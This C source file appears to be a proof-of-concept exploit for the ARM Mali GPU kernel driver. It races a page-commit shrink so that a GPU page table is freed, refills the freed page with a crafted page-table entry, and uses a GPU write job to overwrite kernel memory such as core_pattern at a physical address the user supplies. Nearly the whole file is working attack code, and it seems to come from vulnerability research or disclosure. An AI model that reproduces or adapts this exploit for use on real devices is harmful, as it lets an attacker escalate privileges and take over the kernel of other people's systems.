#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/prctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

union kbase_ioctl_mem_alloc {
	struct {
		__u64 va_pages;
		__u64 commit_pages;
		__u64 extension;
		__u64 flags;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
	} out;
};
#define KBASE_IOCTL_MEM_ALLOC \
	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

struct kbase_ioctl_mem_free {
	__u64 gpu_addr;
};
#define KBASE_IOCTL_MEM_FREE \
	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)

struct kbase_ioctl_mem_commit {
        __u64 gpu_addr;
        __u64 pages;
};
#define KBASE_IOCTL_MEM_COMMIT \
        _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)

struct base_mem_import_user_buffer {
    __u64 ptr;
      __u64 length;
};
union kbase_ioctl_mem_import {
    struct {
          __u64 flags;
              __u64 phandle;
                  __u32 type;
                      __u32 padding;
                        } in;
      struct {
            __u64 flags;
                __u64 gpu_va;
                    __u64 va_pages;
                      } out;
};
#define KBASE_IOCTL_MEM_IMPORT \
    _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)

struct base_jd_udata {
	__u64 blob[2];
};
typedef __u8 base_atom_id;
typedef __u8 base_jd_dep_type;
struct base_dependency {
	base_atom_id atom_id;
	base_jd_dep_type dependency_type;
};
typedef __u8 base_jd_prio;
typedef __u32 base_jd_core_req;
  #define BASE_JD_REQ_SOFT_JOB        ((base_jd_core_req)1 << 9)
  #define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
  #define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
  #define BASE_JD_REQ_EXTERNAL_RESOURCES   ((base_jd_core_req)1 << 8)
struct base_external_resource {
        __u64 ext_resource;
};
struct base_jd_fragment {
	__u64 norm_read_norm_write;
	__u64 norm_read_forced_write;
	__u64 forced_read_forced_write;
	__u64 forced_read_norm_write;
};
typedef struct base_jd_atom {
	__u64 seq_nr;
	__u64 jc;
	struct base_jd_udata udata;
	__u64 extres_list;
	__u16 nr_extres;
	__u8 jit_id[2];
	struct base_dependency pre_dep[2];
	base_atom_id atom_number;
	base_jd_prio prio;
	__u8 device_nr;
	__u8 jobslot;
	base_jd_core_req core_req;
	__u8 renderpass_id;
	__u8 padding[7];
} base_jd_atom;
struct kbase_ioctl_job_submit {
	__u64 addr;
	__u32 nr_atoms;
	__u32 stride;
};
#define KBASE_IOCTL_JOB_SUBMIT \
	_IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)



struct base_jd_event_v2 {
	__u32 event_code;
	base_atom_id atom_number;
	__u8 padding[3];
	struct base_jd_udata udata;
};



// data structures from
// https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/src/panfrost/lib/genxml/v9.xml
struct job_header {
  /* 0:0  */ uint32_t exception_status;
  /* 1:0  */ uint32_t first_incomplete_task;
  /* 2:0  */ uint64_t fault_pointer;
  /* 4:0  */ uint32_t unused0 : 1;
  /* 4:1  */ uint32_t job_type : 7; /*important*/
    #define MALI_JOB_TYPE_WRITE_VALUE 2
  /* 4:8  */ uint32_t barrier : 1; /*important*/
  /* 4:9  */ uint32_t unused1 : 2;
  /* 4:11 */ uint32_t suppress_prefetch : 1; /*important*/
  /* 4:12 */ uint32_t unused2 : 2;
  /* 4:14 */ uint32_t relax_dependency_1 : 1;
  /* 4:15 */ uint32_t relax_dependency_2 : 1;
  /* 4:16 */ uint32_t index : 16; /*important*/
  /* 5:0  */ uint32_t dependency_1 : 16;
  /* 5:16 */ uint32_t dependency_2 : 16;
  /* 6:0  */ uint64_t next;
};
struct write_value_job {
  struct job_header hdr;
  uint64_t address;
  uint64_t type;
    #define MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 7
  uint64_t immediate_value;
};

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
	    16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

// standard mali setup dance
static int open_mali(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));
  struct kbase_ioctl_version_check vc = {
    .major = 11,
    .minor = 11
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  void *tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));
  return mali_fd;
}

// WARNING: committed pages are not zeroed
static void *mali_alloc(int mali_fd, unsigned long va_pages, unsigned long commit_pages) {
  //printf("mali_alloc(%d, %lu, %lu)\n", mali_fd, va_pages, commit_pages);
  union kbase_ioctl_mem_alloc ma = {
    .in = {
      .va_pages = va_pages,
      .commit_pages = commit_pages,
      .flags = 0xf/*RW for CPU+GPU*/
    }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
  unsigned long gpu_va;
  assert(ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/);
  return SYSCHK(mmap(NULL, va_pages*0x1000UL, PROT_READ|PROT_WRITE, MAP_SHARED, mali_fd,
                     ma.out.gpu_va));
}

static void mali_commit(int mali_fd, void *addr, unsigned long pages) {
  struct kbase_ioctl_mem_commit mc = {
    .gpu_addr = (unsigned long)addr,
    .pages = pages
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_COMMIT, &mc));
}

static void *mali_alloc_aligned(void **actual_head, unsigned long *padding_pages, int mali_fd, unsigned long va_pages, unsigned long commit_pages) {
again:;
  *actual_head = mali_alloc(mali_fd, 511 + va_pages, 0);
  unsigned long pos_in_2M_area = (((unsigned long)*actual_head) / 0x1000) % 512;
  *padding_pages = (pos_in_2M_area == 0) ? 0 : (512 - pos_in_2M_area);
  void *result = ((char*)*actual_head) + 0x1000UL * *padding_pages;
  unsigned long result_n = (unsigned long)result;
  if (result_n / (512*512*0x1000UL) != (result_n + va_pages * 0x1000UL) / (512*512*0x1000UL)) {
    printf("whoops, straddling 1G boundary, might be trouble - trying again...\n");
    // just leak this memory, otherwise we'll get the same area again
    goto again;
  }
  mali_commit(mali_fd, *actual_head, *padding_pages + commit_pages);
  return result;
}

int main(int argc, char **argv) {
  if (argc != 2)
    errx(1, "invocation: %s <target physical address>", argv[0]);

  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  /*
   * {core_pattern in /proc/kallsyms} - {_text in /proc/kallsyms}
   * + {Kernel code in /proc/iomem}
   * (You may have to set /proc/sys/kernel/kptr_restrict to 1 to see uncensored
   * /proc/kallsyms.)
   */
  unsigned long target_phys_addr = strtoul(argv[1], NULL, 0);
  unsigned long target_phys_page = target_phys_addr & ~0xfffUL;
  unsigned long target_offset = target_phys_addr & 0xfffUL;

  int mali_fd1 = open_mali();
  int mali_fd2 = open_mali();

  /*
   * 2M aligned area containing 2 2M areas.
   * commit set so that the second 2M area contains exactly 1 page.
   */
  void *main_vma_actual_head;
  unsigned long main_vma_padding_pages;
  char *main_vma = mali_alloc_aligned(&main_vma_actual_head, &main_vma_padding_pages,
                                      mali_fd1, 2*512, 512+1);

  /* fill private pool with pages, ensure shared pool is mostly empty */
  char *pool_flush_vma = mali_alloc(mali_fd1, 16384, 16384);
  munmap(pool_flush_vma, 16384 * 0x1000);

  /*
   * allocate 2M aligned area populated with 1 page (to ensure that adding more
   * pages later won't cause page table allocation)
   */
  void *reuse_vma_actual_head;
  unsigned long reuse_vma_padding_pages;
  char *reuse_vma = mali_alloc_aligned(&reuse_vma_actual_head, &reuse_vma_padding_pages,
                                      mali_fd2, 512, 1);

  struct write_value_job *wvj = (void*)main_vma;
  unsigned long write_target = (unsigned long)main_vma + 0x1000 * 512 + target_offset;
  wvj->hdr.job_type = MALI_JOB_TYPE_WRITE_VALUE;
  wvj->hdr.barrier = 1; /* ? */
  wvj->hdr.suppress_prefetch = 1; /* ? */
  wvj->hdr.index = 1; /* ? */
  wvj->address = (unsigned long)write_target;
  wvj->type = MALI_WRITE_VALUE_TYPE_IMMEDIATE_64;
  wvj->immediate_value = ('p'<<0)|('o'<<8)|('t'<<16)|('a'<<24)|((uint64_t)'t'<<32)|((uint64_t)'o'<<40);

  /*
   * kbase_mem_commit() (pointlessly!) takes the mmap_sem in write mode, so we
   * have to use separate processes here instead of threads to be able to use
   * two independent mali instances in parallel.
   * (There's no reason I can see to use mmap_sem there at all, the operations
   * we do on kernel memory management stuff happen through the struct mapping,
   * not through the mm_struct. Oh well.)
   */
  pid_t child = SYSCHK(fork());
  if (child == 0) {
    printf("unmap child start, <<<<< RELYING ON KERNEL PATCH TO MAKE THIS SLOW >>>>>\n");
    SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
    /*
     * reduce commit by 1 page; this makes one pagetable become empty and get
     * freed
     */
    mali_commit(mali_fd1, main_vma_actual_head, main_vma_padding_pages + 512);
    SYSCHK(prctl(PR_SET_NAME, "dummy"));
    printf("unmap child end, <<<<< THIS SHOULD BE AFTER THE JOB IS DONE >>>>>\n");
    exit(0);
  }

  usleep(500*1000);

  printf("bumping commit of reuse_vma...\n");
  mali_commit(mali_fd2, reuse_vma_actual_head, reuse_vma_padding_pages + 1 + 16);
  printf("... done bumping commit of reuse_vma\n");
  /*
   * write our crafted PTE into all reused pages, one of them should be the
   * freed page table
   */
  for (int i=1; i<1+16; i++)
    *(volatile uint64_t *)(reuse_vma + 0x1000UL * i) = 0x0040000000000443UL | target_phys_page;
  printf("done filling reused (?) pages\n");


  // Now we submit a job with an atom that requires the
  // KBASE_MEM_TYPE_IMPORTED_USER_BUF as an external resource. As part of
  // setting up this job, Mali will go through kbase_jd_user_buf_map(), which
  // grabs and stores page references.
  // When this job is done, it will drop the page references again; but since it
  // is a BASE_JD_REQ_SOFT_EVENT_WAIT request, it will wait until it times out
  // or the event has been set by userspace.
  struct base_jd_atom atom1 = {
    .atom_number = 0,
    .core_req = (1<<4)|(1<<10),
    .jc = (unsigned long)wvj
  };
  struct kbase_ioctl_job_submit js1 = {
    .addr = (unsigned long)&atom1,
    .nr_atoms = 1,
    .stride = sizeof(atom1)
  };
  SYSCHK(ioctl(mali_fd1, KBASE_IOCTL_JOB_SUBMIT, &js1));
  printf("submitted, waiting for event\n");

  struct base_jd_event_v2 event;
  assert(SYSCHK(read(mali_fd1, &event, sizeof(event))) == sizeof(event));
  printf("got event\n");
  printf("  atom 0x%02hhx: event_code=0x%08x (1 means completed, 4 means terminated)\n", event.atom_number, event.event_code);
  printf("    exception status: 0x%x (1 means COMPLETE)\n", wvj->hdr.exception_status);
  printf("    first_incomplete_task: 0x%x\n", wvj->hdr.first_incomplete_task);
  printf("    fault_pointer: 0x%x\n", wvj->hdr.fault_pointer);

  int status;
  SYSCHK(waitpid(child, &status, 0));
}
